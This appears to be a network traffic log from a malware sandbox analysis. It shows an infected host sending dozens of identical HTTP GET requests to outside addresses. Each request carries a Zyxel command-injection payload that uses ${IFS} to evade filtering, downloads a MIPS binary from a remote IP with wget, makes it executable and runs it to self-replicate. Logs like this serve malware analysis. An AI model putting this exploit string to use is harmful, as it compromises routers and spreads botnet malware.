                                                Jan 12, 2024 18:24:34.802330971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4033192.168.2.133586879.215.133.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802347898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4034192.168.2.1343640188.157.63.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802381039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4035192.168.2.134438619.96.83.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802428961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4036192.168.2.134878237.24.121.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802478075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4037192.168.2.1350130205.47.121.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802515984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4038192.168.2.133436279.112.219.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802531004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4039192.168.2.1345148211.110.54.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802561998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4040192.168.2.135628660.111.118.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802628994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4041192.168.2.1350308159.135.64.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802649975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4042192.168.2.1347848122.175.1.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802683115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4043192.168.2.135333037.146.192.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802726984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4044192.168.2.1344156102.23.163.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802748919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4045192.168.2.133588044.85.121.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802778006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4046192.168.2.1347670129.139.160.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802831888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4047192.168.2.1341554141.217.149.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802877903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4048192.168.2.135979697.164.213.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802911043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4049192.168.2.134605814.120.27.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802975893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4050192.168.2.1356258205.64.220.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802988052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4051192.168.2.133437886.41.138.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803030968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4052192.168.2.133811440.85.115.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803061962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4053192.168.2.134100287.57.210.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803111076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4054192.168.2.135785825.136.137.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803141117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4055192.168.2.1357868119.139.118.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803193092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4056192.168.2.1351426161.92.3.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803220034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4057192.168.2.134293697.178.35.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803256035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4058192.168.2.1350904200.150.229.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803298950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4059192.168.2.134053875.158.51.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803339005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4060192.168.2.1333954115.80.235.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803380013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4061192.168.2.1338504161.38.177.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803425074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4062192.168.2.133879219.43.139.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803457022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4063192.168.2.134004661.214.38.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803512096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4064192.168.2.133591878.106.115.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803545952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4065192.168.2.136004236.223.108.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803582907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4066192.168.2.135946034.185.75.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803603888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4067192.168.2.134984058.246.150.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803658962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4068192.168.2.1335014209.109.243.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803684950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4069192.168.2.1346668119.112.247.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803738117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4070192.168.2.1336290205.74.186.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803766966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4071192.168.2.1353370114.189.18.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803786993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4072192.168.2.134211253.145.65.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803848028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4073192.168.2.135067476.101.168.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803883076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4074192.168.2.133554496.155.234.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803930998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4075192.168.2.1353892114.78.96.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.803980112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4076192.168.2.1347098149.134.100.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804006100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4077192.168.2.1353230219.125.53.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804039001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4078192.168.2.134100243.53.214.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804092884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4079192.168.2.134578887.15.130.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804141045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4080192.168.2.1346038185.246.96.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804168940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4081192.168.2.1333412179.166.4.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804203033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4082192.168.2.1360206151.221.110.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804264069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4083192.168.2.1359668207.177.63.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804291964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4084192.168.2.134067092.38.40.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804322958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4085192.168.2.13441749.21.132.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804373980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4086192.168.2.135249891.233.184.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804413080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4087192.168.2.134675066.184.21.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804450035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4088192.168.2.134453692.248.223.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804497957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4089192.168.2.1339586170.234.5.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804547071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4090192.168.2.1357310135.232.202.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804589033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4091192.168.2.136087431.30.183.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804620028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4092192.168.2.1334088208.27.196.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804661036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4093192.168.2.136071083.125.253.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804708004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4094192.168.2.1349932141.187.235.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.804737091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4095192.168.2.135599077.56.51.219443
                                                TimestampBytes transferredDirectionData
